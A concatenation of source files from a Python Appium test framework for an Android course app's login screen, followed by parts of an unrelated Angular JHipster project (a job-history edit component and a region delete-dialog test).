手机的driver信息
'''
write_file = WriteUserCommand()
device = write_file.get_value('user_info_'+str(i), 'daviceName')
port = write_file.get_value('user_info_'+str(i), 'port')
systemport = write_file.get_value('user_info_'+str(i), 'systemport')
capabilities = {
"platformName": "Android",
"automationName": "UiAutomator2",
"deviceName": device,
#"deviceName":"2a25e47b7d29",
"app": "E:\\mukewang.apk",
#"app": "E:\\慕课网.apk",
"appActivity" : ".user.login.MCLoginActivity",
"noReset":"true",
"systemPort":systemport,
}
driver = webdriver.Remote("http://127.0.0.1:" +port+"/wd/hub",capabilities)
time.sleep(10)
return driver
def ios_driver(self):
pass
def get_driver(self):
pass<file_sep>/business/login_business.py
import sys
sys.path.append("..")
from handle.login_handle import LoginHandle
import time
class LoginBusiness:
def __init__(self,i):
self.login_handle = LoginHandle(i)
def login_pass(self):
self.login_handle.send_username('18513199586')
self.login_handle.send_password('<PASSWORD>')
self.login_handle.click_login()
def login_user_error(self):
self.login_handle.send_username('18513199587')
self.login_handle.send_password('<PASSWORD>')
self.login_handle.click_login()
time.sleep(3)
user_flag = self.login_handle.get_fail_toast('账号未注册')
if user_flag:
return True
else:
return False
def login_password_error(self):
self.login_handle.send_username('18513199586')
self.login_handle.send_password('<PASSWORD>')
self.login_handle.click_login()
time.sleep(3)
user_flag = self.login_handle.get_fail_toast('登录密码错误')
if user_flag:
return True
else:
return False
<file_sep>/case/start_appium.py
import sys
sys.path.append("..")
from appium import webdriver
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from util.get_by_local import GetByLocal
#from util.read_init import ReadIni
def get_driver():
capabilities = {
"platformName": "Android",
"automationName": "UiAutomator2",
"deviceName": "127.0.0.1:21503",
#"deviceName":"2a25e47b7d29",
"app": "E:\\mukewang.apk",
#"app": "E:\\慕课网.apk",
#"appActivity" : ".index.splash.GuideActivity"
"noReset":"true"
}
driver = webdriver.Remote("http://127.0.0.1:4723/wd/hub",capabilities)
time.sleep(3)
return driver
#获取屏幕宽高
def get_size():
size = driver.get_window_size()
width = size['width']
height = size['height']
return width,height
#向左滑动
def swipe_left():
x1 = get_size()[0]/10*9
y1 = get_size()[1]/2
x = get_size()[0]/10
driver.swipe(x1,y1,x,y1)
#向右滑动
def swipe_right():
x1 = get_size()[0]/10
y1 = get_size()[1]/2
x = get_size()[0]/10*9
driver.swipe(x1,y1,x,y1)
#向上滑动
def swipe_up():
x1 = get_size()[0]/2
y1 = get_size()[1]/10*9
y = get_size()[1]/10
driver.swipe(x1,y1,x1,y)
#向下滑动
def swipe_down():
x1 = get_size()[0]/2
y1 = get_size()[1]/10
y = get_size()[1]/10*9
driver.swipe(x1,y1,x1,y)
def swipe_on(direction):
if direction == 'up':
swipe_up()
elif direction == 'down':
swipe_down()
elif direction == 'left':
swipe_left()
elif direction == 'right':
swipe_right()
#通过resource_id定位
def go_login():
#print(driver.find_element_by_id('cn.com.open.mooc:id/tv_go_login'))
driver.find_element_by_id('cn.com.open.mooc:id/tv_go_login').click()
#通过class定位
def go_login_by_class():
#print(driver.find_element_by_class_name('android.widget.TextView'))
elements = driver.find_elements_by_class_name('android.widget.TextView')
#print(elements)
#print(len(elements))
elements[4].click()
#通过id定位
def login():
get_by_local = GetByLocal(driver)
get_by_local.get_element('username').send_keys('18513199586')
get_by_local.get_element('password').send_keys('111111')
get_by_local.get_element('login_button').click()
'''
driver.find_element_by_id(username).send_keys('18513199586')
driver.find_element_by_id(password).send_keys('111111')
driver.find_element_by_id(login_button).click()
'''
#通过层级定位
def login_by_node():
element = driver.find_element_by_id('cn.com.open.mooc:id/sv_scrollview') #查找需要定位的上级元素id
elements = element.find_elements_by_class_name('android.widget.EditText')
elements[0].send_keys('18513199586')
elements[1].send_keys('111111')
driver.find_element_by_id('cn.com.open.mooc:id/login_lable').click()
#通过uiautomator定位
def login_by_uiautomator():
driver.find_element_by_android_uiautomator('new UiSelector().text("手机号/邮箱")').clear()
driver.find_element_by_android_uiautomator('new UiSelector().text("手机号/邮箱")').send_keys('18513199586')
driver.find_element_by_android_uiautomator('new UiSelector().resourceId("cn.com.open.mooc:id/password_edit")').send_keys('111111')
def login_by_xpath():
driver.find_element_by_xpath('//*[contains(@text,"忘记")]').click()#找到页面中text包含“忘记”的元素
#driver.find_element_by_xpath('//android.widget.TextView[@text="忘记密码"]').click() #查找页面属性是android.widget.TextView,text是忘记密码的元素
#driver.find_element_by_xpath('//android.widget.TextView[contains(@text,"忘记")]').click()#查找页面属性是android.widget.TextView,text是包含“忘记”的元素
'''
#通过子节点,找父节点的兄弟节点
driver.find_element_by_xpath('//android.widget.TextView[@resource-id="cn.com.open.mooc:id/login_lable"]/../preceding-sibling::android.widget.RelativeLayout').send_keys('123')
driver.find_element_by_xpath('//android.widget.TextView[@resource-id="cn.com.open.mooc:id/login_lable"]/../preceding-sibling::*[@index="2"]').send_keys('111111')
'''
def get_web_wiev():
#time.sleep(5)
webview = driver.contexts
for view in webview:
print(view)
if view == 'NATIVE_APP':
print("true")
driver.switch_to.context(view)
break
time.sleep(5)
driver.find_element_by_id('cn.com.open.mooc:id/icon_close').click()
def get_toast():
time.sleep(5)
#driver.find_element_by_id('cn.com.open.mooc:id/account_edit').send_keys('18513199587')
#driver.find_element_by_id('cn.com.open.mooc:id/login_lable').click()
get_by_local = GetByLocal(driver)
get_by_local.get_element('username').send_keys('18513199587')
get_by_local.get_element('password').send_keys('111111')
get_by_local.get_element('login_button').click()
time.sleep(2)
toast_element = ("xpath", "//*[contains(@text,'账号未注册')]")
print(type(toast_element))
print(WebDriverWait(driver, 10,0.1).until(EC.presence_of_element_located(toast_element)))
driver = get_driver()
'''
swipe_on('left')
time.sleep(2)
swipe_on('left')
time.sleep(2)
swipe_on('right')
time.sleep(2)
swipe_on('left')
time.sleep(2)
swipe_on('up')
time.sleep(2)
'''
go_login()
#go_login_by_class()
get_toast()
#login_by_node()
#login_by_uiautomator()
#login_by_xpath()
#get_web_wiev()
#get_toast()
#print(driver.page_source)
#driver.quit()<file_sep>/keyword/get_data.py
import sys
sys.path.append("..")
from util.opera_excel import OperaExcel
class GetData:
def __init__(self):
self.opera_excel = OperaExcel()
def get_case_lines(self):
'''
获取case.xlsx行数
'''
lines = self.opera_excel.get_lines()
return lines
def get_handle_step(self,row):
'''
获取case.xlsx的步骤列,即操作方法名称
'''
method_name = self.opera_excel.get_cell(row,3)
return method_name
def get_element_key(self,row):
'''
获取case.xlsx的元素列,即元素的key
'''
element_key = self.opera_excel.get_cell(row,4)
if element_key =='':
return None
else:
return element_key
def get_handle_value(self,row):
'''
获取case.xlsx的操作值列,即输入的数据
'''
handle_value = self.opera_excel.get_cell(row,5)
if handle_value =='':
return None
else:
return handle_value
def get_expect_element(self,row):
'''
获取case.xlsx的预期元素列
'''
expect_element = self.opera_excel.get_cell(row,6)
if expect_element =='':
return None
else:
return expect_element
def get_is_run(self,row):
'''
获取case.xlsx的是否运行列
'''
is_run = self.opera_excel.get_cell(row,9)
if is_run == 'yes':
return True
else:
return False
def get_expect_handle(self,row):
'''
获取case.xlsx的是否运行列
'''
expect_handle = self.opera_excel.get_cell(row,7)
if expect_handle =='':
return None
else:
return expect_handle
def get_expect_value(self,row):
'''
获取case.xlsx的是否运行列
'''
expect_value = self.opera_excel.get_cell(row,8)
if expect_value =='':
return None
else:
return expect_value
def write_value(self,row,value):
self.opera_excel.write_value(row,value)
if __name__ == '__main__':
print(GetData().get_case_lines())
print(GetData().get_expect_handle(3))
<file_sep>/util/server.py
import sys
sys.path.append("..")
from util.dos_cmd import DosCmd
from util.port import Port
import threading
from util.write_user_command import WriteUserCommand
import time
class Server:
def __init__(self):
self.dos = DosCmd()
self.devices_list = self.get_devices()
self.write_file = WriteUserCommand()
def get_devices(self):
'''
获取设备信息
返回信息格式['127.0.0.1:21503', '127.0.0.1:21523']
'''
devices_list = []
#self.dos = DosCmd()
result_list = self.dos.excute_cmd_get_result('adb devices')
if len(result_list) >=2:
for i in result_list:
if i[-6:] == 'device':
devices_list.append(i[:-7])
return devices_list
else:
return none
def create_port_list(self,start_port):
'''
按照adb devices的设备台数,以及端口是否被专用,生成可用的端口号
'''
port = Port()
port_list = port.create_port_list(start_port, self.devices_list)
return port_list
def create_command_list(self,i):
'''
根据设备名,台数以及端口信息,返回启动appium的命令
'''
command_list = []
appium_port_list = self.create_port_list(4700)
bootstrap_port_list = self.create_port_list(4900)
system_port_list = self.create_port_list(5100)
device_list = self.devices_list
command = 'appium -p ' +str(appium_port_list[i])+ ' -bp ' + str(bootstrap_port_list[i]) + ' -U ' + device_list[i] + ' --no-reset --session-override --log ../log/test'+str(i+1)+'.log'
command_list.append(command)
self.write_file.write_data(i,device_list[i],str(bootstrap_port_list[i]),str(appium_port_list[i]),system_port_list[i])
return command_list
def start_server(self,i):
'''
被线程调用,通过程序,自动启动appium多台设备
'''
self.start_list = self.create_command_list(i)
print(self.start_list)
self.dos.excute_cmd(self.start_list[0])
def kill_server(self):
'''
判断node是否允许,允许的话,杀掉进程
'''
server_list = self.dos.excute_cmd_get_result('tasklist | findstr "node.exe"')
if len(server_list) > 0:
self.dos.excute_cmd('taskkill -F -PID node.exe')
def main(self):
'''
调用start_server,多线程启动多台设备的appium
'''
self.write_file.clear_data()
self.kill_server()
for i in range(len(self.devices_list)):
appium_start = threading.Thread(target=self.start_server,args=(i,))
appium_start.start()
time.sleep(20)
if __name__ == '__main__':
Server().main()
<file_sep>/keyword/run_main.py
import sys
sys.path.append("..")
from get_data import GetData
from aciton_method import ActionMethod
from util.server import Server
class RunMain:
def run_method(self):
Server().main()
data = GetData()
aciton_method = ActionMethod()
lines = data.get_case_lines()
for i in range(1,lines):
handle_step = data.get_handle_step(i) #获得excel中步骤值
element_key = data.get_element_key(i) #获得excel中元素值
handle_value = data.get_handle_value(i) #获得excel中操作值
expect_key = data.get_expect_element(i) #获得excel中预期步骤值
expect_step = data.get_expect_handle(i) #获得excel中预期结果值
expect_value = data.get_expect_value(i)
print("-------第几行------:",i+1)
#getattr--获取aciton_method中名为handle_step的值的方法或属性,返回如input_key()
excute_method = getattr(aciton_method,handle_step) #获得ActionMethod中的方法名,如ActionMethod().input_key
if element_key != None:#如果操作值不为空
excute_method(element_key,handle_value) #传入参数,执行相应方法,返回如driver.find_element_by_XX(XXXX).send_keys(handle_value)
else:
excute_method(handle_value)#返回如driver.find_element_by_XX(XXXX).click()
if expect_step != None:
'''
expect_result = getattr(aciton_method,expect_step)#获得ActionMethod().get_element
print('------------expect_result-----------',expect_result)
result = expect_result(expect_key)#返回如driver.find_element_by_XX(expect_key)
print('-------result-----------',result)
if result:
data.write_value(i,'pass')
else:
data.write_value(i,'fail')
'''
expect_result = getattr(aciton_method,expect_step)#获得ActionMethod().get_element
#print('------------expect_result-----------',expect_result)
if expect_key:
result = expect_result(expect_key)#返回如driver.find_element_by_XX(expect_key)
#print('-------expect_key:result-----------',result)
if result:
data.write_value(i,'pass')
#print('-------expect_key:result-----------pass')
else:
data.write_value(i,'fail')
#print('-------expect_key:result-----------fail')
else:
result = expect_result(expect_value)
#print('-------expect_value:result-----------',result)
if result:
data.write_value(i,'pass')
#print('-------expect_value:result-----------pass')
else:
data.write_value(i,'fail')
#print('-------expect_value:result-----------fail')
if __name__ == '__main__':
RunMain().run_method()<file_sep>/case/test_case.py
import unittest
import HtmlTestRunner
import threading
import multiprocessing
import time
from appium import webdriver
import sys
sys.path.append("..")
from business.login_business import LoginBusiness
from util.server import Server
from util.write_user_command import WriteUserCommand
class ParameTestCase(unittest.TestCase):
'''
unittest能传入参数,编写父类
'''
def __init__(self, methodName='runTest',parame=None):
super(ParameTestCase,self).__init__(methodName)
global parames #为了能在setUpClass(cls)中使用parame,定义全局变量
parames = parame
class CaseTest(ParameTestCase):
'''
继承ParameTestCase类
'''
@classmethod
def setUpClass(cls):
print('setUpClass',parames)
cls.login_business = LoginBusiness(parames)
def setUp(self):
print("this is setup")
def test_01(self):
print("para:"+str(parames))
self.login_business.login_pass()
<EMAIL>("CaseTest") #跳过下面的test_02,CaseTest为类名
def test_02(self):
print("para:"+str(parames))
self.login_business.login_user_error()
def tearDown(self):
print("this is teardown")
def appium_init():
server = Server()
server.main()
def get_suite(i):
suite = unittest.TestSuite()
suite.addTest(CaseTest("test_02",parame=i))
suite.addTest(CaseTest("test_01",parame=i))
#unittest.TextTestRunner().run(suite)
file_name = 'report'+str(i+1)
HtmlTestRunner.HTMLTestRunner(output="../report",report_name=file_name).run(suite)
def get_count():
writer_user_file = WriteUserCommand()
count = writer_user_file.get_file_lines()
return count
if __name__ == '__main__':
appium_init()
threads = []
for i in range(get_count()):
print('threads',i)
#t = threading.Thread(target=get_suite,args=(i,)) #多线程
t = multiprocessing.Process(target=get_suite,args=(i,))
threads.append(t)
for j in threads:
j.start()
<file_sep>/util/write_user_command.py
import yaml
class WriteUserCommand:
def read_data(self):
'''
读取yaml文件数据,返回字段
'''
with open('../config/userconfig.yaml') as f:
data = yaml.load(f, Loader=yaml.FullLoader)
return data
def get_value(self,key,port):
'''
获取yaml文件字典中某个参数值
'''
data = self.read_data()
value = data[key][port]
return value
def write_data(self,i,device,bp,port,systemport):
'''
数据写入yaml文件
'''
data = self.join_data(i,device,bp,port,systemport)
with open("../config/userconfig.yaml","a") as f:
yaml.dump(data,f)
def join_data(self,i,device,bp,port,systemport):
data = {
'user_info_'+str(i):{
'daviceName':device,
'bp':bp,
'port':port,
'systemport':systemport
}}
return data
def clear_data(self):
'''
删除yaml文件内容
'''
with open("../config/userconfig.yaml","w") as f:
f.truncate()
def get_file_lines(self):
data = self.read_data()
return len(data)
if __name__ == '__main__':
WriteUserCommand().write_data(1,'127.0.0.1:21503','4900','4700',5100)
print(WriteUserCommand().get_value('user_info_1','bp'))
#print(write_file)<file_sep>/page/login_page.py
import sys
sys.path.append("..")
from util.get_by_local import GetByLocal
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from base.base_driver import BaseDriver
class LoginPage:
def __init__(self,i):
base_driver =BaseDriver()
self.driver = base_driver.android_driver(i)
self.get_by_local = GetByLocal(self.driver)
def get_username_element(self):
return self.get_by_local.get_element('username')
def get_password_element(self):
return self.get_by_local.get_element('password')
def get_login_button_element(self):
return self.get_by_local.get_element('login_button')
def get_forget_password_element(self):
return self.get_by_local.get_element('forget_password')
def get_register_element(self):
return self.get_by_local.get_element('register')
def get_toast_element(self, message):
xpath_element = "//*[contains(@text," + message + ")]"
#toast_element = ("xpath", "//*[contains(@text,'+message+')]")
toast_element = ("xpath", xpath_element)
#print(type(toast_element))
#print(WebDriverWait(self.driver, 10,0.01).until(EC.presence_of_element_located(toast_element)))
return WebDriverWait(self.driver, 10,0.01).until(EC.presence_of_element_located(toast_element))
<file_sep>/README.md
PO模型、关键字模型
# # 定义# #
Page Object Model的核心是分离测试对象和测试数据
# config #
配置测试数据等
case.xls,关键字模型的测试步骤及数据
LocalElement.ini,页面元素的属性等
userconfig.yaml,多进程,程序自动存储的设备号,端口信息
# util #
读取config文件中的元素属性信息key,value
定义查找元素是按照id或者classname等方式,返回driver.find_element_by_key('value')
dos_cmd.py,python调用执行cmd命令
get_by_local.py,分解ini文件,取到元素方法、属性,并返回driver.find_element_by_XXX(元素属性)
opera_excel.py,关键字模型,处理excel
port.py,判断端口是否被占用,生成可用的端口
read_init.py,读取ini文件等号后面的值
server.py,多线程启动多台设备的appium
write_user_command.py,定义处理yaml文件的方式
# base #
定义driver
# page #
调取util,整合util中的文件,定义被测页面全部元素信息;调用driver,定义driver
# handle #
调用page,定义被测页面全部元素的操作方式,如send_keys或click
# business #
业务:调用handle,传入输入框数据等参数等,定义测试案例的操作步骤
# case #
调用business,执行测试案例、报告输出定义等
# report #
存储测试报告
# keyword #
aciton_method.py,关键字模型,定义操作,获取元素属性等操作
get_data.py,从调用util-opera_excel.py,从config-case.xls中,获取关键字模型的数据
run_main.py,关键字模型运行程序的入口,执行excel测试案例,并填写测试结果
# log #
appium的允许日志存储的地方
<file_sep>/util/read_init.py
import configparser
'''
read_ini = configparser.ConfigParser()
read_ini.read('../config/LocalElement.ini')
print(read_ini.get('login_element','username'))
'''
class ReadIni:
def __init__(self,file_path=None):
if file_path == None:
self.file_path = '../config/LocalElement.ini'
else:
self.file_path = file_path
self.data = self.read_ini()
def read_ini(self):
read_ini = configparser.ConfigParser()
#read_ini.read('file_path')
read_ini.read(self.file_path)
return read_ini
def get_value(self, key, section = 'login_element'):
'''
获取ini文件中的key值
'''
try:
value = self.data.get(section,key)
except:
value = None
return value
if __name__ == '__main__':
read_ini = ReadIni()
print(read_ini.get_value('username','login_element'))<file_sep>/util/dos_cmd.py
import os
class DosCmd:
def excute_cmd_get_result(self,command):
'''
返回cmd中命令的执行结果,如cmd输入adb devices后的结果
'''
result_list = []
result = os.popen(command).readlines()
for i in result:
if i =='\n':
continue
result_list.append(i.strip('\n'))
return result_list
def excute_cmd(self,command):
os.system(command)
if __name__ == '__main__':
print(DosCmd().excute_cmd_get_result('adb devices'))
<file_sep>/keyword/aciton_method.py
import sys
sys.path.append("..")
from util.get_by_local import GetByLocal
from base.base_driver import BaseDriver
import time
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
class ActionMethod:
def __init__(self):
self.driver = BaseDriver().android_driver(0)
self.get_by_local = GetByLocal(self.driver)
def input_key(self,*args):#利用*args传入不确定个数参数,下面的args[0]取到第一个参数的值
'''
输入框
'''
element = self.get_by_local.get_element(args[0])
if element == None:
return args[0],"元素未找到"
element.send_keys(args[1])
def on_click(self,*args):
'''
点击
'''
element = self.get_by_local.get_element(args[0])
if element == None:
return args[0],"元素未找到"
element.click()
def sleep_time(self,*args):
'''
等待
'''
time.sleep(int(args[0]))
def get_size(self,*args):
'''
获取屏幕宽高
'''
size = self.driver.get_window_size()
width = size['width']
height = size['height']
return width,height
def swipe_left(self,*args):
'''
向左滑动
'''
x1 = self.get_size()[0]/10*9
y1 = self.get_size()[1]/2
x = self.get_size()[0]/10
self.driver.swipe(x1,y1,x,y1)
print(x1,y1,x)
print('OK')
def swipe_right(self,*args):
'''
向右滑动
'''
x1 = self.get_size()[0]/10
y1 = self.get_size()[1]/2
x = self.get_size()[0]/10*9
self.driver.swipe(x1,y1,x,y1)
def swipe_up(self,*args):
'''
向上滑动
'''
x1 = self.get_size()[0]/2
y1 = self.get_size()[1]/10*9
y = self.get_size()[1]/10
self.driver.swipe(x1,y1,x1,y)
def swipe_down(self,*args):
'''
向下滑动
'''
x1 = self.get_size()[0]/2
y1 = self.get_size()[1]/10
y = self.get_size()[1]/10*9
self.driver.swipe(x1,y1,x1,y)
def get_element(self,*args):
'''
获取元素,返回如driver.find_element_by_XX(expect_key)
'''
element = self.get_by_local.get_element(args[0])
if element == None:
return None
return element
def get_toast(self,*args):
toast_element = ("xpath", "//*[contains(@text,args[0])]")
print(type(toast_element))
print(WebDriverWait(self.driver, 10,0.1).until(EC.presence_of_element_located(toast_element)))
element = WebDriverWait(self.driver, 10,0.1).until(EC.presence_of_element_located(toast_element))
if element == None:
return None
return element
<file_sep>/util/port.py
import sys
sys.path.append("..")
from util.dos_cmd import DosCmd
class Port:
def port_is_used(self,port_num):
'''
判断端口是否被占用
'''
command = 'netstat -ano | findstr ' + str(port_num)
result = DosCmd().excute_cmd_get_result(command)
if len(result)>0:
flag = True
else:
flag = False
return flag
def create_port_list(self,start_port,device_list):
'''
返回可用的端口列表
'''
port_list = []
if device_list != None:
while len(port_list) != len(device_list):
if self.port_is_used(start_port) != True:
port_list.append(start_port)
start_port = start_port +1
return port_list
else:
print("生成可用端口失败")
return None
if __name__ == '__main__':
device_list=[1,2,3,4,5]
print(Port().create_port_list(8079,device_list))
<file_sep>/config/LocalElement.ini
[login_element]
username = id>cn.com.open.mooc:id/account_edit
password = id>cn.com.open.mooc:id/password_edit
login_button = id>cn.com.open.mooc:id/login_lable
forget_password = id>cn.com.open.mooc:id/forget_lable
register = id>cn.com.open.mooc:id/tv_register
| b6eb1c8f510056b5e784b9425920c5e42aecc138 | [
"Markdown",
"Python",
"INI"
] | 16 | Python | cwx727/Appium-Python- | b10d62914302f17b0df95e379cfd5fa0de3eff23 | 44a3b9ec032eb63fda20ad1fb300596c059f0ecc |
refs/heads/master | <file_sep>//
// Post.swift
// Makestagram
//
// Created by <NAME> on 2017-06-30.
// Copyright © 2017 <NAME>. All rights reserved.
//
import Foundation
import UIKit
import FirebaseDatabase.FIRDataSnapshot
class Post {
// properties and initializers
var key: String?
let imageURL: String
let imageHeight: CGFloat
let creationDate: Date
init(imageURL: String, imageHeight: CGFloat) {
self.imageURL = imageURL
self.imageHeight = imageHeight
self.creationDate = Date()
}
var dictValue: [String : Any] {
let createdAgo = creationDate.timeIntervalSince1970
return["image_url" : imageURL,
"image_height" : imageHeight,
"created_at" : createdAgo]
}
}
<file_sep>//
// FindFriendsViewController.swift
// Makestagram
//
// Created by <NAME> on 2017-06-29.
// Copyright © 2017 <NAME>. All rights reserved.
//
import Foundation
| 26b64a7286fdcdc68c8556db6275d1c5ae1af06f | [
"Swift"
] | 2 | Swift | raymonddiamonds/Makestagram | 61223c5ed07a0a12a3533ff411c43852c216de17 | ba0cb93a8c6473dd73058150713888b09126192d |
refs/heads/main | <file_sep># pure-js-note-app
Very simple note application using pure JavaScript.
<file_sep>// take the form references using object
const fromFields = {}
fromFields.textNote = document.querySelector('#textNote');
fromFields.priority = document.querySelector('#priority');
fromFields.addBtn = document.querySelector('#addBtn');
// notes div to push it all
const allNotes = document.querySelector('#allNotes');
// receive keyboard event by default to textarea
fromFields.textNote.focus();
// add note function
function addNote() {
let text = fromFields.textNote.value;
let priority = fromFields.priority.value;
let note = document.createElement('div');
let deleteBtn = document.createElement('span');
note.classList.add('col-md-4');
note.classList.add('single-note');
note.innerHTML = `
<div class='note-text'>
<p>${text}</p>
<br>
<span>Priority: ${priority}</span>
</div>
`;
deleteBtn.classList.add('remove');
deleteBtn.innerHTML = 'X';
note.appendChild(deleteBtn);
allNotes.appendChild(note);
fromFields.textNote.value = '';
fromFields.textNote.focus();
// listner remove
addListenerRemoveNote(deleteBtn);
}
// remove note
function removeNote(e) {
let eventNote = e.target.parentNode;
eventNote.parentNode.removeChild(eventNote);
}
function addListenerRemoveNote(deleteBtn) {
deleteBtn.addEventListener('click', function (e) {
e.stopPropagation();
removeNote(e);
});
}
// all event listner
// "Create Note" Event Listener
fromFields.addBtn.addEventListener('click', function (e) {
e.preventDefault();
if (fromFields.textNote.value != '') {
// call create function
addNote();
}
else {
alert('Please add your note before click add button');
}
})
| 23c3978e4f82033678688e95fc5e722f06647ac6 | [
"Markdown",
"JavaScript"
] | 2 | Markdown | MohcinBN/pure-js-note-app | 3f1429a5a44249a6aeb037bc2015a10ce56e853b | 1a1293251d83fa32937df276013dec2ec3ec45b2 |
refs/heads/main | <file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { Observable } from 'rxjs';
import { finalize, map } from 'rxjs/operators';
import * as dayjs from 'dayjs';
import { DATE_TIME_FORMAT } from 'app/config/input.constants';
import { IJobHistoryMySuffix, JobHistoryMySuffix } from '../job-history-my-suffix.model';
import { JobHistoryMySuffixService } from '../service/job-history-my-suffix.service';
import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
import { JobMySuffixService } from 'app/entities/job-my-suffix/service/job-my-suffix.service';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { DepartmentMySuffixService } from 'app/entities/department-my-suffix/service/department-my-suffix.service';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
import { EmployeeMySuffixService } from 'app/entities/employee-my-suffix/service/employee-my-suffix.service';
@Component({
selector: 'jhi-job-history-my-suffix-update',
templateUrl: './job-history-my-suffix-update.component.html',
})
export class JobHistoryMySuffixUpdateComponent implements OnInit {
isSaving = false;
jobsCollection: IJobMySuffix[] = [];
departmentsCollection: IDepartmentMySuffix[] = [];
employeesCollection: IEmployeeMySuffix[] = [];
editForm = this.fb.group({
id: [],
startDate: [],
endDate: [],
language: [],
job: [],
department: [],
employee: [],
});
constructor(
protected jobHistoryService: JobHistoryMySuffixService,
protected jobService: JobMySuffixService,
protected departmentService: DepartmentMySuffixService,
protected employeeService: EmployeeMySuffixService,
protected activatedRoute: ActivatedRoute,
protected fb: FormBuilder
) {}
ngOnInit(): void {
this.activatedRoute.data.subscribe(({ jobHistory }) => {
if (jobHistory.id === undefined) {
const today = dayjs().startOf('day');
jobHistory.startDate = today;
jobHistory.endDate = today;
}
this.updateForm(jobHistory);
this.loadRelationshipsOptions();
});
}
previousState(): void {
window.history.back();
}
save(): void {
this.isSaving = true;
const jobHistory = this.createFromForm();
if (jobHistory.id !== undefined) {
this.subscribeToSaveResponse(this.jobHistoryService.update(jobHistory));
} else {
this.subscribeToSaveResponse(this.jobHistoryService.create(jobHistory));
}
}
trackJobMySuffixById(index: number, item: IJobMySuffix): string {
return item.id!;
}
trackDepartmentMySuffixById(index: number, item: IDepartmentMySuffix): string {
return item.id!;
}
trackEmployeeMySuffixById(index: number, item: IEmployeeMySuffix): string {
return item.id!;
}
protected subscribeToSaveResponse(result: Observable<HttpResponse<IJobHistoryMySuffix>>): void {
result.pipe(finalize(() => this.onSaveFinalize())).subscribe(
() => this.onSaveSuccess(),
() => this.onSaveError()
);
}
protected onSaveSuccess(): void {
this.previousState();
}
protected onSaveError(): void {
// Api for inheritance.
}
protected onSaveFinalize(): void {
this.isSaving = false;
}
protected updateForm(jobHistory: IJobHistoryMySuffix): void {
this.editForm.patchValue({
id: jobHistory.id,
startDate: jobHistory.startDate ? jobHistory.startDate.format(DATE_TIME_FORMAT) : null,
endDate: jobHistory.endDate ? jobHistory.endDate.format(DATE_TIME_FORMAT) : null,
language: jobHistory.language,
job: jobHistory.job,
department: jobHistory.department,
employee: jobHistory.employee,
});
this.jobsCollection = this.jobService.addJobMySuffixToCollectionIfMissing(this.jobsCollection, jobHistory.job);
this.departmentsCollection = this.departmentService.addDepartmentMySuffixToCollectionIfMissing(
this.departmentsCollection,
jobHistory.department
);
this.employeesCollection = this.employeeService.addEmployeeMySuffixToCollectionIfMissing(this.employeesCollection, jobHistory.employee);
}
protected loadRelationshipsOptions(): void {
this.jobService
.query({ filter: 'jobhistory-is-null' })
.pipe(map((res: HttpResponse<IJobMySuffix[]>) => res.body ?? []))
.pipe(map((jobs: IJobMySuffix[]) => this.jobService.addJobMySuffixToCollectionIfMissing(jobs, this.editForm.get('job')!.value)))
.subscribe((jobs: IJobMySuffix[]) => (this.jobsCollection = jobs));
this.departmentService
.query({ filter: 'jobhistory-is-null' })
.pipe(map((res: HttpResponse<IDepartmentMySuffix[]>) => res.body ?? []))
.pipe(
map((departments: IDepartmentMySuffix[]) =>
this.departmentService.addDepartmentMySuffixToCollectionIfMissing(departments, this.editForm.get('department')!.value)
)
)
.subscribe((departments: IDepartmentMySuffix[]) => (this.departmentsCollection = departments));
this.employeeService
.query({ filter: 'jobhistory-is-null' })
.pipe(map((res: HttpResponse<IEmployeeMySuffix[]>) => res.body ?? []))
.pipe(
map((employees: IEmployeeMySuffix[]) =>
this.employeeService.addEmployeeMySuffixToCollectionIfMissing(employees, this.editForm.get('employee')!.value)
)
)
.subscribe((employees: IEmployeeMySuffix[]) => (this.employeesCollection = employees));
}
protected createFromForm(): IJobHistoryMySuffix {
return {
...new JobHistoryMySuffix(),
id: this.editForm.get(['id'])!.value,
startDate: this.editForm.get(['startDate'])!.value ? dayjs(this.editForm.get(['startDate'])!.value, DATE_TIME_FORMAT) : undefined,
endDate: this.editForm.get(['endDate'])!.value ? dayjs(this.editForm.get(['endDate'])!.value, DATE_TIME_FORMAT) : undefined,
language: this.editForm.get(['language'])!.value,
job: this.editForm.get(['job'])!.value,
department: this.editForm.get(['department'])!.value,
employee: this.editForm.get(['employee'])!.value,
};
}
}
<file_sep>jest.mock('@ng-bootstrap/ng-bootstrap');
import { ComponentFixture, TestBed, inject, fakeAsync, tick } from '@angular/core/testing';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { of } from 'rxjs';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { RegionMySuffixService } from '../service/region-my-suffix.service';
import { RegionMySuffixDeleteDialogComponent } from './region-my-suffix-delete-dialog.component';
describe('Component Tests', () => {
describe('RegionMySuffix Management Delete Component', () => {
let comp: RegionMySuffixDeleteDialogComponent;
let fixture: ComponentFixture<RegionMySuffixDeleteDialogComponent>;
let service: RegionMySuffixService;
let mockActiveModal: NgbActiveModal;
beforeEach(() => {
TestBed.configureTestingModule({
imports: [HttpClientTestingModule],
declarations: [RegionMySuffixDeleteDialogComponent],
providers: [NgbActiveModal],
})
.overrideTemplate(RegionMySuffixDeleteDialogComponent, '')
.compileComponents();
fixture = TestBed.createComponent(RegionMySuffixDeleteDialogComponent);
comp = fixture.componentInstance;
service = TestBed.inject(RegionMySuffixService);
mockActiveModal = TestBed.inject(NgbActiveModal);
});
describe('confirmDelete', () => {
it('Should call delete service on confirmDelete', inject(
[],
fakeAsync(() => {
// GIVEN
spyOn(service, 'delete').and.returnValue(of({}));
// WHEN
comp.confirmDelete('ABC');
tick();
// THEN
expect(service.delete).toHaveBeenCalledWith('ABC');
expect(mockActiveModal.close).toHaveBeenCalledWith('deleted');
})
));
it('Should not call delete service on clear', () => {
// GIVEN
spyOn(service, 'delete');
// WHEN
comp.cancel();
// THEN
expect(service.delete).not.toHaveBeenCalled();
expect(mockActiveModal.close).not.toHaveBeenCalled();
